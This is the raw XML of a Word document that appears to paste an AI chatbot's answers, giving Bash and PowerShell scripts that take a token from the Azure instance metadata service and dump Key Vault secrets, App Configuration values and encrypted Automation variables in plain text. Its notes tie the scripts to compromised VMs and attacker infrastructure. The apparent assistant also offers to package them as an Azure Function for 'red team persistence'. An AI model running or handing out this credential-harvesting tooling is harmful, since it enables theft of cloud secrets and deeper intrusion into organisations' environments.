      </w:r>
    </w:p>
    <w:p w14:paraId="2C557D3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for config in $(az appconfig list --query "[].name" -o tsv); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2AE07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echo "  - AppConfig: $config"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB4211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az appconfig kv list --name "$config" --query "[].{Key:key, Value:value}" -o tsv 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B28C38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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BA3EE6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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0BCF61" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F1F7D33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# Function: Dump Automation Variables (requires permission)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7612F9D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dump_automation_variables() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5108D307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echo "[+] Enumerating Automation Accounts for variables..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94867D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for rg in $(az group list --query "[].name" -o tsv); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF8462D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for account in $(az automation account list --resource-group "$rg" --query "[].name" -o tsv 2&gt;/dev/null); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A8DAE0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echo "  - Automation Account: $account (Resource Group: $rg)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E1BBDD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vars=$(az automation variable list --automation-account-name "$account" --resource-group "$rg" --query "[?encrypted==\`true\`].name" -o tsv 2&gt;/dev/null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F0C3C3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for var in $vars; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4692C557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value=$(az automation variable show --name "$var" --automation-account-name "$account" --resource-group "$rg" --query "value" -o tsv 2&gt;/dev/null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A9689C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echo "    [Variable] $var =&gt; $value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091EDF86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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0071C9A9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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285211CB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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F815177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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F3AD4" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C20AB28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# Function: Use IMDS (if running on Azure VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C531D10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use_imds() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8EA848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echo "[+] Attempting IMDS Token Retrieval..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADAB835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token=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com&amp;api-version=2018-02-01" | jq -r '.access_token')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D9B262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if [[ "$token" != "null" &amp;&amp; ! -z "$token" ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219D0703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export AZURE_TOKEN=$token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2022B46A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echo "  [*] IMDS Token retrieved successfully"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70146E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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCCBC91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echo "  [!] Failed to retrieve token from IMDS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356AE337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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B74F8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E32C94" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1432057B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# === Execution Flow ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E08FFB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use_imds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4827D8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dump_keyvault_secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D3AB2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dump_appconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31A578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dump_automation_variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA5A82A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524D8397">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3031163F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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F3132" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Works on Linux/macOS or WSL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7F41DA" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Can be run on a compromised VM or from attacker infrastructure (if credentials/token is set).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0E173F" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>You can optionally wrap this into a PowerShell script for Windows VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E9790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02BE1FB6">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56295AA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Would you like a </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PowerShell version</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or want this converted into an </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Function for red team automation</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88D095" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB691EA" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="690870C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Here is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PowerShell version</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the Azure secrets enumeration script — ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Windows-based VMs</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, red team operations, or blue team audit automation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC94E3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52D33327">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40487A38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🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell Script: Azure Secrets Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37858133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# Prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA469D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# - Logged into Azure CLI or use token from IMDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6033BAA4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lastRenderedPageBreak/>
        <w:t># - Azure CLI and Az PowerShell modules installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8C1BF7" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0919AC46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function Use-IMDS {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2AF3B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Write-Host "[+] Attempting to retrieve token from IMDS..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51392DF1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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A469A5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$headers = @{ Metadata = "true" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5375926B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$response = Invoke-RestMethod -Headers $headers -Uri "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com&amp;api-version=2018-02-01"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607EE48B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if ($response.access_token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1281E2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    $env:AZURE_ACCESS_TOKEN = $response.access_token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040DAFB2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    Write-Host "[*] IMDS Token retrieved successfully."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C19E50E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    az account get-access-token --access-token $env:AZURE_ACCESS_TOKEN | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28751611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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDC44B2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} catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5344352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Write-Host "[!] Failed to retrieve token from IMDS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB921B7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F5AEC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5FE9E0" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609BFD8E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function Dump-KeyVault-Secrets {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5B1FDA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Write-Host "`n[+] Enumerating Azure Key Vaults..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1E448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$vaults = az keyvault list --query "[].name" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FF822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foreach ($vault in $vaults) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223231B9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Write-Host "  - Vault: $vault"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAA4837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$secrets = az keyvault secret list --vault-name $vault --query "[].name" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A16727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foreach ($secret in $secrets) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF4910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    $value = az keyvault secret show --vault-name $vault --name $secret --query "value" -o tsv 2&gt;$null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A2DB6D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    Write-Host "    [Secret] $secret =&gt; $value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC8E506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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F06FDE8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A47883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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15429FFF" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3800BB93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function Dump-AppConfigs {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F28CA40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Write-Host "`n[+] Enumerating App Configuration Stores..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE3B68B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$configs = az appconfig list --query "[].name" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDEBC4C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foreach ($config in $configs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EAAC98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Write-Host "  - AppConfig: $config"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EBF5CB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az appconfig kv list --name $config --query "[].{Key:key, Value:value}" -o tsv 2&gt;$null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07415DE4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BBB1F1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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A65AA5" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F03B97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function Dump-Automation-Variables {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2AECEC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Write-Host "`n[+] Enumerating Automation Account Variables..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CFBDC7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$resourceGroups = az group list --query "[].name" -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B03CE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foreach ($rg in $resourceGroups) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181E54CC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$accounts = az automation account list --resource-group $rg --query "[].name" -o tsv 2&gt;$null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA7E3E2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foreach ($account in $accounts) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE43C5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    Write-Host "  - Automation Account: $account (RG: $rg)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDAC146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    $vars = az automation variable list --automation-account-name $account --resource-group $rg --query "[?encrypted==\`true\`].name" -o tsv 2&gt;$null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793552B3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    foreach ($var in $vars) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB286AE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        $value = az automation variable show --name $var --automation-account-name $account --resource-group $rg --query "value" -o tsv 2&gt;$null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5792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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                Write-Host "    [Variable] $var =&gt; $value"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4266CDDA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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3EC7F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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C4CF34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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4DDC86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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F11EA54" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5776D9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# === Execution Flow ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7756F8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Use-IMDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205056C4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Dump-KeyVault-Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D5B9E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Dump-AppConfigs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250A201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>Dump-Automation-Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A63BF87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0B5E3531">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB77C9B" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3402A0" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Automatically retrieves a token from </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>IMDS</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ideal for compromised Azure VMs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F55966F" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Dumps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0178DFCB" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Key Vault secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E1C75" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>App Configuration key-values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25066057" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Encrypted Automation Account variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AAB28D" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Works on </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PowerShell 5.x</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7+</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Azure CLI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F908B40" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="382B50FF">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="573AE50A" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRPr="004A2591" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Would you like this packaged as an </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Function</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2591">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., for red team persistence or internal automation)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0971829C" w14:textId="77777777" w:rsidR="00C316C8" w:rsidRDefault="00C316C8" w:rsidP="00C316C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="708DB0CC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049"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C52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1C5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC9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01729"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67B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B3531"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDA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6133F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2494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8659A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4072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D219F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="070E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360646">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1215118088">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="432895370">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1992826075">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="870335916">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1645349920">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="781537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6C8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16C8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9F1DE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0150B52A-DE5F-4F43-B65B-18B32C887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6C8"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos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ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI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6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6C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6C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6C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6C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6C8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6C8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6C8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6C8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6C8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6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6C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C316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6C8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C31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C8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C316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1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1488</Words>
  <Characters>8486</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>70</Lines>
  <Paragraphs>19</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2026-04-06T12:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T12:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>